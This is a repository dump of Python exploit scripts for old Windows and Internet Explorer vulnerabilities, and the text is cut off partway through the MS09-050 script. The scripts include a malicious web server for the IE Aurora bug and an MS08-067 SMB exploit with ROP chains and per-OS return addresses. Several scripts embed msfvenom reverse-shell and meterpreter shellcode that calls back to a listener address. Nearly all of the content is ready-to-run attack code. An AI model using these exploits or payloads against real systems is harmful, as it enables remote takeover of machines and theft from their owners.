├── README.md
├── ie_aurora.py
├── ms08_067.py
├── ms09-050.py
├── oracle_9i_xdb_ftp.py
└── protfpd_exploit.py


/README.md:
--------------------------------------------------------------------------------
 1 | # python-exploits
 2 | Repository for python exploits 
 3 | 
 4 | # MS08-067
 5 | 
 6 | This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
 7 | Metasploit - https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
 8 | 
 9 | 
10 | 
11 | # MS09-050
12 | 
13 | This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw
14 | 
15 | http://www.cvedetails.com/cve/cve-2009-3103
16 | 
17 | 
18 | 
19 | # ProFTPd IAC 1.3.x - Remote Root Exploit
20 | 
21 | Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
22 | 
23 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4221
24 | 
25 | # IE Aurora exploit 
26 | 
27 | Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4; Windows XP SP2 and SP3; Windows Server 2003 SP2; Windows Vista Gold, SP1, and SP2; Windows Server 2008 Gold, SP2, and R2; and Windows 7 allows remote attackers to execute arbitrary code by accessing a pointer associated with a deleted object, related to incorrectly initialized memory and improper handling of objects in memory, as exploited in the wild in December 2009 and January 2010 during Operation Aurora, aka "HTML Object Memory Corruption Vulnerability."
28 | 
29 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249
30 | 
31 | # Oracle 9i XDB FTP PASS Overflow (win32)
32 | 
33 | By passing an overly long string to the PASScommand, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations inexploit methods between Linux andWindows" presented at the Blackhat
34 | conference.
35 | 
36 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
37 | 


--------------------------------------------------------------------------------
/ie_aurora.py:
--------------------------------------------------------------------------------
  1 | #
  2 | #   Author : Ahmed Obied (ahmed.obied@gmail.com)
  3 | #
  4 | #   This program acts as a web server that generates an exploit to 
  5 | #   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
  6 | #   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
  7 | #   The exploit's payload spawns the calculator. 
  8 | #
  9 | #   Usage  : python ie_aurora.py [port number]
 10 | #   
 11 |  
 12 | import sys
 13 | import socket
 14 | 
 15 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
 16 |         
 17 | class RequestHandler(BaseHTTPRequestHandler):
 18 | 
 19 |     def convert_to_utf16(self, payload):
 20 |         enc_payload = ''
 21 |         for i in range(0, len(payload), 2):
 22 |             num = 0
 23 |             for j in range(0, 2):
 24 |                 num += (ord(payload[i + j]) & 0xff) << (j * 8)
 25 |             enc_payload += '%%u%04x' % num
 26 |         return enc_payload
 27 |                 
 28 |     def get_payload(self):
 29 |   # msfvenom -p windows/shell_reverse_tcp LHOST=[IP]LPORT=4443 EXITFUNC=process -b "\x00" -f js_le    
 30 | 	payload = "%u95bf%u73e2%udbc3%ud9cf%u2474%u5ef4%uc931%u52b1%uee83%u31fc%u0e7e%ueb03%u91ec%uef36%ud719%u0fb9%ub8da%uea30%uf8eb%u7f27%uc95b%u2d2c%ua250%uc561%uc6e3%ueaad%u6c44%uc588%udd55%u44e8%u1cd6%ua63d%ueee7%ua730%u1220%uf5b8%u58f9%ue96f%u158e%u82ac%ub8dd%u77b4%ubb95%u2695%ue5ad%uc935%u9e62%ud17f%u9b67%u6a36%u5753%ubac9%u98ad%u8366%u6b01%uc476%u94a6%u3c0d%u29d5%ufb16%uf5a7%u1f93%u7d0f%ufb03%u52b1%u88d2%u1fbe%ud690%u9ea2%u6d75%u2bde%ua178%u6f56%u655f%u2b32%u3cfe%u9a9e%u5eff%u4241%u155a%u976c%u74d7%u54f9%u86da%uf2f9%uf56d%u5dcb%u91c6%u1567%u66c0%u0c87%uf8b4%uaf76%ud1c5%ufbbc%u4995%u8414%u897d%u5199%ud9d1%u0a35%u8992%ufaf5%uc37a%u25f9%uec9a%u4dd3%u1731%u7bb4%u17cd%u1474%u17d3%ubf65%uf15a%u2fef%uaa0b%ud687%u2016%u1639%u4d8d%u9c79%ub222%u5534%ua04e%u95a1%u9a05%ua964%ub2b3%u38eb%u4258%u2165%u15f7%u9722%uf30e%u8ede%ue1b8%u5622%ua182%uabf8%u280d%u908c%u3a29%u1848%u6e76%u4f04%ud820%u39e2%ub282%u96bc%u524c%ud538%u244e%u3045%uc839%uedf4%uf77c%u7a39%u8089%u1a27%u5b76%u2aec%uc13d%ua345%u9098%uaed7%u4f1a%ud71b%u6598%u2ce4%u0c80%u69e1%ufd06%ue29b%u01e3%u020f%u4126"
 31 | 
 32 | 	return payload
 33 |     
 34 |     def get_exploit(self):
 35 |         exploit = '''
 36 |         <html>
 37 |         <head>
 38 |             <script>
 39 |             
 40 |             var obj, event_obj;
 41 |             
 42 |             function spray_heap()
 43 |             {
 44 |                 var chunk_size, payload, nopsled;
 45 |             
 46 |                 chunk_size = 0x80000;
 47 |                 payload = unescape("<PAYLOAD>");
 48 |                 nopsled = unescape("<NOP>");
 49 |                 while (nopsled.length < chunk_size)
 50 |                     nopsled += nopsled;
 51 |                 nopsled_len = chunk_size - (payload.length + 20);        
 52 |                 nopsled = nopsled.substring(0, nopsled_len);
 53 |                 heap_chunks = new Array();
 54 |                 for (var i = 0 ; i < 200 ; i++)
 55 |                     heap_chunks[i] = nopsled + payload;
 56 |             }
 57 |         
 58 |             function initialize()
 59 |             {
 60 |                 obj = new Array();
 61 |                 event_obj = null;
 62 |                 for (var i = 0; i < 200 ; i++ )
 63 |                     obj[i] = document.createElement("COMMENT");
 64 |             }
 65 |         
 66 |             function ev1(evt)
 67 |             {
 68 |                 event_obj = document.createEventObject(evt);
 69 |                 document.getElementById("sp1").innerHTML = "";
 70 |                 window.setInterval(ev2, 1);
 71 |             }
 72 |       
 73 |             function ev2()
 74 |             {
 75 |                 var data, tmp;
 76 |                 
 77 |                 data = "";
 78 |                 tmp = unescape("%u0a0a%u0a0a");
 79 |                 for (var i = 0 ; i < 4 ; i++)
 80 |                     data += tmp;
 81 |                 for (i = 0 ; i < obj.length ; i++ ) {
 82 |                     obj[i].data = data;
 83 |                 }
 84 |                 event_obj.srcElement;
 85 |             }
 86 |                     
 87 |             function check()
 88 |             
 89 | 		{
 90 |                 document.write(navigator.userAgent);
 91 |                 return true;   
 92 |             }
 93 |             
 94 |             if (check()) {
 95 |                 initialize();
 96 |                 spray_heap();               
 97 |             }
 98 |             else
 99 |                 window.location = 'about:blank'
100 |                 
101 |             </script>
102 |         </head>
103 |         <body>
104 | 		<h2> Hello </h2>
105 |             <span id="sp1">
106 |             <img src="aurora.gif" onload="ev1(event)">
107 |             </span>        
108 |         </body>
109 |         </html>
110 |         '''
111 |         exploit = exploit.replace('<PAYLOAD>', self.get_payload())
112 |         exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
113 |         return exploit 
114 | 
115 |     def get_image(self):
116 |         content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
117 |         content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
118 |         content += '\x01\x00\x3b'
119 |         return content
120 | 
121 |     def log_request(self, *args, **kwargs):
122 |         pass
123 |         
124 |     def do_GET(self):
125 |         try:
126 |             if self.path == '/':
127 |                 print
128 |                 print '[-] Incoming connection from %s' % self.client_address[0]
129 |                 self.send_response(200) 
130 |                 self.send_header('Content-Type', 'text/html')
131 |                 self.end_headers()
132 |                 print '[-] Sending exploit to %s ...' % self.client_address[0]
133 | 		self.wfile.write(self.get_exploit())
134 |                 print '[-] Exploit sent to %s' % self.client_address[0]
135 |             elif self.path == '/aurora.gif':      
136 |                 self.send_response(200)
137 |                 self.send_header('Content-Type', 'image/gif')
138 |                 self.end_headers()
139 |                 self.wfile.write(self.get_image())
140 |         except: 
141 |             print '[*] Error : an error has occured while serving the HTTP request'
142 |             print '[-] Exiting ...'
143 |             sys.exit(-1)
144 |             
145 |                        
146 | def main():
147 |     if len(sys.argv) != 2:
148 |         print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
149 |         sys.exit(0)
150 |     try:
151 |         port = int(sys.argv[1])
152 |         if port < 1024 or port > 65535:
153 |             raise ValueError
154 |         try:
155 |             serv = HTTPServer(('', port), RequestHandler)
156 |             ip = socket.gethostbyname(socket.gethostname())
157 |             print '[-] Web server is running at http://%s:%d/' % (ip, port)
158 |             try:
159 |                 serv.serve_forever()
160 |             except:
161 |                 print '[-] Exiting ...' 
162 |         except socket.error:
163 |             print '[*] Error : a socket error has occurred'
164 |         sys.exit(-1)    
165 |     except ValueError:
166 |         print '[*] Error : an invalid port number was given'
167 |         sys.exit(-1)
168 |             
169 | if __name__ == '__main__':
170 |     main()
171 | 


--------------------------------------------------------------------------------
/ms08_067.py:
--------------------------------------------------------------------------------
  1 | import struct
  2 | import time
  3 | import sys
  4 | 
  5 | from threading import Thread  # Thread is imported incase you would like to modify
  6 | 
  7 | try:
  8 |     from impacket import smb
  9 |     from impacket import uuid
 10 |     from impacket.dcerpc import dcerpc
 11 |     from impacket.dcerpc import transport
 12 | 
 13 | except ImportError as _:
 14 | 
 15 |     print('Install the following library to make this script work')
 16 |     print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
 17 |     print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
 18 |     sys.exit(1)
 19 | 
 20 | print('#######################################################################')
 21 | print('#   MS08-067 Exploit')
 22 | print('#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).')
 23 | print(
 24 |     '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi')
 25 | print('#######################################################################\n')
 26 | 
 27 | # Shellcode: Staged Reverse TCP shellcode for meterpreter 
 28 | # Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
 29 | # Payload size: 380 bytes + 30 NOPS
 30 | # Make sure you set meterpreter EXITFUNC=thread  - Important!
 31 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.47 LPORT=4444EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c
 32 | shellcode = (
 33 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 34 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 35 |     "\x33\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
 36 |     "\x49\x8d\xa8\x90\x83\xee\xfc\xe2\xf4\xb5\x65\x2a\x90\x49\x8d"
 37 |     "\xc8\x19\xac\xbc\x68\xf4\xc2\xdd\x98\x1b\x1b\x81\x23\xc2\x5d"
 38 |     "\x06\xda\xb8\x46\x3a\xe2\xb6\x78\x72\x04\xac\x28\xf1\xaa\xbc"
 39 |     "\x69\x4c\x67\x9d\x48\x4a\x4a\x62\x1b\xda\x23\xc2\x59\x06\xe2"
 40 |     "\xac\xc2\xc1\xb9\xe8\xaa\xc5\xa9\x41\x18\x06\xf1\xb0\x48\x5e"
 41 |     "\x23\xd9\x51\x6e\x92\xd9\xc2\xb9\x23\x91\x9f\xbc\x57\x3c\x88"
 42 |     "\x42\xa5\x91\x8e\xb5\x48\xe5\xbf\x8e\xd5\x68\x72\xf0\x8c\xe5"
 43 |     "\xad\xd5\x23\xc8\x6d\x8c\x7b\xf6\xc2\x81\xe3\x1b\x11\x91\xa9"
 44 |     "\x43\xc2\x89\x23\x91\x99\x04\xec\xb4\x6d\xd6\xf3\xf1\x10\xd7"
 45 |     "\xf9\x6f\xa9\xd2\xf7\xca\xc2\x9f\x43\x1d\x14\xe5\x9b\xa2\x49"
 46 |     "\x8d\xc0\xe7\x3a\xbf\xf7\xc4\x21\xc1\xdf\xb6\x4e\x72\x7d\x28"
 47 |     "\xd9\x8c\xa8\x90\x60\x49\xfc\xc0\x21\xa4\x28\xfb\x49\x72\x7d"
 48 |     "\xfa\x4c\xe5\xa2\x9b\x49\xa2\xc0\x92\x49\x9c\xf4\x19\xaf\xdd"
 49 |     "\xf8\xc0\x19\xcd\xf8\xd0\x19\xe5\x42\x9f\x96\x6d\x57\x45\xde"
 50 |     "\xe7\xb8\xc6\x1e\xe5\x31\x35\x3d\xec\x57\x45\xcc\x4d\xdc\x9a"
 51 |     "\xb6\xc3\xa0\xe5\xa5\x65\xc9\x90\x49\x8d\xc2\x90\x23\x89\xfe"
 52 |     "\xc7\x21\x8f\x71\x58\x16\x72\x7d\x13\xb1\x8d\xd6\xa6\xc2\xbb"
 53 |     "\xc2\xd0\x21\x8d\xb8\x90\x49\xdb\xc2\x90\x21\xd5\x0c\xc3\xac"
 54 |     "\x72\x7d\x03\x1a\xe7\xa8\xc6\x1a\xda\xc0\x92\x90\x45\xf7\x6f"
 55 |     "\x9c\x0e\x50\x90\x34\xaf\xf0\xf8\x49\xcd\xa8\x90\x23\x8d\xf8"
 56 |     "\xf8\x42\xa2\xa7\xa0\xb6\x58\xff\xf8\x3c\xe3\xe5\xf1\xb6\x58"
 57 |     "\xf6\xce\xb6\x81\x8c\x79\x38\x72\x57\x6f\x48\x4e\x81\x56\x3c"
 58 |     "\x4a\x6b\x2b\xa9\x90\x82\x9a\x21\x2b\x3d\x2d\xd4\x72\x7d\xac"
 59 |     "\x4f\xf1\xa2\x10\xb2\x6d\xdd\x95\xf2\xca\xbb\xe2\x26\xe7\xa8"
 60 |     "\xc3\xb6\x58\xa8\x90"
 61 | )
 62 | 
 63 | # Shellcode2 - Standard Reverse TCP shellcode 
 64 | # Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
 65 | # Payload size: 348 szie + 62 NOPS
 66 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c
 67 | shellcode2 = (
 68 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 69 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 70 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 71 |     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 72 |     "\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
 73 |     "\x63\xe6\x45\x9d\x83\xee\xfc\xe2\xf4\x9f\x0e\xc7\x9d\x63\xe6"
 74 |     "\x25\x14\x86\xd7\x85\xf9\xe8\xb6\x75\x16\x31\xea\xce\xcf\x77"
 75 |     "\x6d\x37\xb5\x6c\x51\x0f\xbb\x52\x19\xe9\xa1\x02\x9a\x47\xb1"
 76 |     "\x43\x27\x8a\x90\x62\x21\xa7\x6f\x31\xb1\xce\xcf\x73\x6d\x0f"
 77 |     "\xa1\xe8\xaa\x54\xe5\x80\xae\x44\x4c\x32\x6d\x1c\xbd\x62\x35"
 78 |     "\xce\xd4\x7b\x05\x7f\xd4\xe8\xd2\xce\x9c\xb5\xd7\xba\x31\xa2"
 79 |     "\x29\x48\x9c\xa4\xde\xa5\xe8\x95\xe5\x38\x65\x58\x9b\x61\xe8"
 80 |     "\x87\xbe\xce\xc5\x47\xe7\x96\xfb\xe8\xea\x0e\x16\x3b\xfa\x44"
 81 |     "\x4e\xe8\xe2\xce\x9c\xb3\x6f\x01\xb9\x47\xbd\x1e\xfc\x3a\xbc"
 82 |     "\x14\x62\x83\xb9\x1a\xc7\xe8\xf4\xae\x10\x3e\x8e\x76\xaf\x63"
 83 |     "\xe6\x2d\xea\x10\xd4\x1a\xc9\x0b\xaa\x32\xbb\x64\x19\x90\x25"
 84 |     "\xf3\xe7\x45\x9d\x4a\x22\x11\xcd\x0b\xcf\xc5\xf6\x63\x19\x90"
 85 |     "\xcd\x33\xb6\x15\xdd\x33\xa6\x15\xf5\x89\xe9\x9a\x7d\x9c\x33"
 86 |     "\xd2\xf7\x66\x8e\x4f\x96\x63\xc9\x2d\x9f\x63\xf7\x19\x14\x85"
 87 |     "\x8c\x55\xcb\x34\x8e\xdc\x38\x17\x87\xba\x48\xe6\x26\x31\x91"
 88 |     "\x9c\xa8\x4d\xe8\x8f\x8e\xb5\x28\xc1\xb0\xba\x48\x0b\x85\x28"
 89 |     "\xf9\x63\x6f\xa6\xca\x34\xb1\x74\x6b\x09\xf4\x1c\xcb\x81\x1b"
 90 |     "\x23\x5a\x27\xc2\x79\x9c\x62\x6b\x01\xb9\x73\x20\x45\xd9\x37"
 91 |     "\xb6\x13\xcb\x35\xa0\x13\xd3\x35\xb0\x16\xcb\x0b\x9f\x89\xa2"
 92 |     "\xe5\x19\x90\x14\x83\xa8\x13\xdb\x9c\xd6\x2d\x95\xe4\xfb\x25"
 93 |     "\x62\xb6\x5d\xa5\x80\x49\xec\x2d\x3b\xf6\x5b\xd8\x62\xb6\xda"
 94 |     "\x43\xe1\x69\x66\xbe\x7d\x16\xe3\xfe\xda\x70\x94\x2a\xf7\x63"
 95 |     "\xb5\xba\x48"
 96 | )
 97 | 
 98 | nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
 99 |             "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
100 | disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
101 |                   28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
102 | ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"
103 | module_base = 0x6f880000
104 | 
105 | 
106 | def generate_rop(rvas):
107 |     gadget1 = "\x90\x5a\x59\xc3"
108 |     gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
109 |     gadget3 = "\xcc\x90\xeb\x5a"
110 |     ret = struct.pack('<L', 0x00018000)
111 |     ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
112 |     ret += struct.pack('<L', 0x01040110)
113 |     ret += struct.pack('<L', 0x01010101)
114 |     ret += struct.pack('<L', 0x01010101)
115 |     ret += struct.pack('<L',
116 |                        rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
117 |     ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
118 |     ret += gadget1
119 |     ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
120 |     ret += struct.pack('<L', rvas['jmp eax'] + module_base)
121 |     ret += gadget2[0]
122 |     ret += gadget2[1]
123 |     ret += struct.pack('<L', rvas[
124 |         'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
125 |     ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
126 |     ret += gadget2[2]
127 |     ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
128 |     ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
129 |     ret += struct.pack('<L', rvas['jmp eax'] + module_base)
130 |     ret += gadget3
131 |     return ret
132 | 
133 | 
134 | class SRVSVC_Exploit(Thread):
135 | 
136 |     def __init__(self, target, os, port=445):
137 |         super(SRVSVC_Exploit, self).__init__()
138 |         self.__port = port
139 |         self.target = target
140 |         self.os = os
141 | 
142 |     def __DCEPacket(self):
143 |         if (self.os == '1'):
144 |             print('Windows XP SP0/SP1 Universal\n')
145 |             ret = "\x61\x13\x00\x01"
146 |             jumper = nonxjmper % (ret, ret)
147 |         elif (self.os == '2'):
148 |             print('Windows 2000 Universal\n')
149 |             ret = "\xb0\x1c\x1f\x00"
150 |             jumper = nonxjmper % (ret, ret)
151 |         elif (self.os == '3'):
152 |             print('Windows 2003 SP0 Universal\n')
153 |             ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
154 |             jumper = nonxjmper % (ret, ret)
155 |         elif (self.os == '4'):
156 |             print('Windows 2003 SP1 English\n')
157 |             ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
158 |             ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
159 |             jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
160 |             disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
161 |             jumper = disableNXjumper % (
162 |                 ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
163 |         elif (self.os == '5'):
164 |             print('Windows XP SP3 French (NX)\n')
165 |             ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
166 |             disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
167 |             # the nonxjmper also work in this case.
168 |             jumper = nonxjmper % (disable_nx, ret)
169 |         elif (self.os == '6'):
170 |             print('Windows XP SP3 English (NX)\n')
171 |             ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
172 |             disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
173 |             # the nonxjmper also work in this case.
174 |             jumper = nonxjmper % (disable_nx, ret)
175 |         elif (self.os == '7'):
176 |             print('Windows XP SP3 English (AlwaysOn NX)\n')
177 |             rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
178 |                        'pop ecx / ret': 0x2e796 + 6,
179 |                        'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f,
180 |                        'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
181 |                        'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64}
182 |             # the nonxjmper also work in this case.
183 |             jumper = generate_rop(rvasets) + "AB"
184 |         else:
185 |             print('Not supported OS version\n')
186 |             sys.exit(-1)
187 | 
188 |         print('[-]Initiating connection')
189 | 
190 |         self.__trans = transport.DCERPCTransportFactory(
191 |             'ncacn_np:%s[\\pipe\\browser]' % self.target)
192 | 
193 |         self.__trans.connect()
194 | 
195 |         print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target)
196 | 
197 |         self.__dce = self.__trans.DCERPC_class(self.__trans)
198 | 
199 |         self.__dce.bind(uuid.uuidtup_to_bin(
200 |             ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
201 |         # Change shellcode to your required shellcode
202 |         path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode2 + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
203 |                "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
204 | 
205 |         server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
206 |         prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
207 | 
208 |         self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \
209 |                       path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
210 | 
211 |         return
212 | 
213 |     def run(self):
214 |         self.__DCEPacket()
215 |         self.__dce.call(0x1f, self.__stub)
216 |         time.sleep(5)
217 |         print('Exploit finish\n')
218 | 
219 | 
220 | if __name__ == '__main__':
221 | 
222 |     try:
223 |         target = sys.argv[1]
224 |         os = sys.argv[2]
225 | 
226 |     except IndexError:
227 |         print('\nUsage: %s <target ip>\n' % sys.argv[0])
228 |         print('Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n')
229 |         print('Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n')
230 |         print('Example: MS08_067.py 192.168.1.1 3 for Windows 2003 SP0 Universal\n')
231 |         print('Example: MS08_067.py 192.168.1.1 4 for Windows 2003 SP1 English\n')
232 |         print('Example: MS08_067.py 192.168.1.1 5 for Windows XP SP3 French (NX)\n')
233 |         print('Example: MS08_067.py 192.168.1.1 6 for Windows XP SP3 English (NX)\n')
234 |         print('Example: MS08_067.py 192.168.1.1 7 for Windows XP SP3 English (AlwaysOn NX)\n')
235 |         sys.exit(-1)
236 | 
237 | current = SRVSVC_Exploit(target, os)
238 | 
239 | current.start()
240 | 


--------------------------------------------------------------------------------
/ms09-050.py:
--------------------------------------------------------------------------------
  1 | # EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
  2 | 
  3 | #!/usr/bin/python
  4 | #This module depends on the linux command line program smbclient. 
  5 | #I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
  6 | #The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
  7 | import tempfile
  8 | import sys
  9 | import subprocess
 10 | from socket import socket
 11 | from time import sleep
 12 | from smb.SMBConnection import SMBConnection
 13 | 
 14 | 
 15 | try:
 16 | 
 17 | 	target = sys.argv[1]
 18 | except IndexError:
 19 | 	print(f'Usage: {sys.argv[0]} <target ip>')
 20 | 	print(f'Example: ms09-050.py 192.168.1.1')
 21 | 	sys.exit(-1)
 22 | 
 23 | #msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.47 LPORT=4447  EXITFUNC=thread  -f c
 24 | #354 bytes long
 25 | 
 26 | shell = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
 27 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
 28 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
 29 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
 30 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
 31 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
 32 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
 33 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
 34 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
 35 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
 36 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
 37 | "\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x0a\x0b\x00\x2f\x68\x02"
 38 | "\x00\x11\x5f\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
 39 | "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
 40 | "\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
 41 | "\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
 42 | "\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
 43 | "\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
 44 | "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
 45 | "\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
 46 | "\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
 47 | "\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0\x1d\x2a\x0a\x68\xa6"
 48 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
 49 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
 50 | 
 51 | 
 52 | 
 53 | #msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4447  EXITFUNC=thread  -f c 
 54 | # 324 bytes long
 55 | # Added 30 NOPS
 56 | 
 57 | shell2 = ("\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 58 | 		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 59 | 		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
